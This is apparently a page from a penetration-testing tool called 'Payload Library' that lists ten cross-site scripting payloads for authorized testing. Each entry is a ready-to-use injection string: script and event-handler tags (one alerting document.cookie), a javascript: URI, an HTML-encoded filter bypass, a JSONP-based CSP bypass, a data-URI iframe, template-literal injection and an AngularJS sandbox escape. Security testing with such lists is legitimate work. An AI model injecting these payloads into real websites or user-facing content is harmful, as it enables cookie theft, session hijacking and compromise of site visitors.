Payload Library

Curated offensive payloads for authorized penetration testing

XSS PAYLOADS - 10
Basic script tag
<script>alert('XSS')</script>
IMG onerror
<img src=x onerror=alert(1)>
SVG onload
<svg onload=alert(document.cookie)>
Details ontoggle
<details open ontoggle=alert(1)>
DOM-based (href)
javascript:alert(document.domain)
Filter bypass (encoded)
&#60;script&#62;alert(1)&#60;/script&#62;
CSP bypass via JSONP
<script src=https://cdn.jsdelivr.net/callback=alert></script>
ℹ Requires CSP allowing CDN
Data URI
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
Template literal
${alert(1)}
Angular ng-src
{{constructor.constructor('alert(1)')()}}
ℹ AngularJS 1.x SSTI